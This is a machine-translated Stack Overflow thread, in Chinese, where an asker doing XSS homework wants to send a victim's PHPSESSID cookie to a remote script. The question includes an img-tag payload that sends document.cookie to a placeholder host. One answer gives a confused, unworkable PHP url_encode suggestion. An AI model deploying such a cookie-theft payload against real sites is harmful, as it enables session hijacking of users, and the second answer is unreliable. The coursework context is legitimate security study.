在url中传递$.variable
在url中传递$.variable
提问于 2014-04-19 05:24:35
我想把一个变量作为一个值传递给一个网站。(在XSS上做作业)
例如,我目前有:$.cookie('echat')和$.cookie('PHPSESSID')。
我想把它传递给一个链接: xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID')
但是,不会向xxxx.com/xxx.php传递任何内容
Any1知道执行此操作的语法吗?
具体地说,我放置了一个类似这样的img标记来利用:
< img src='http://xxxxx.com/xxxxx.php?cookie='+document.cookie>
显然,document.cookie不工作,我需要$.cookie('PHPSESSID')来获取PHPID
回答 2
Stack Overflow用户
发布于 2014-04-19 05:27:47
您的URL在您的PHP脚本中将$_GET['cookie']的值设置为$.cookie('PHPSESSID'),仅此而已。如何处理是由PHP决定的。
正如您希望从您的类中知道的那样,盲目使用用户提交的数据是危险的,也是一个糟糕的想法。
Stack Overflow用户
发布于 2014-04-19 05:33:48
使用此php函数
url_encode("string")比如
http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/23162605
复制相关文章
相似问题
腾讯云开发者
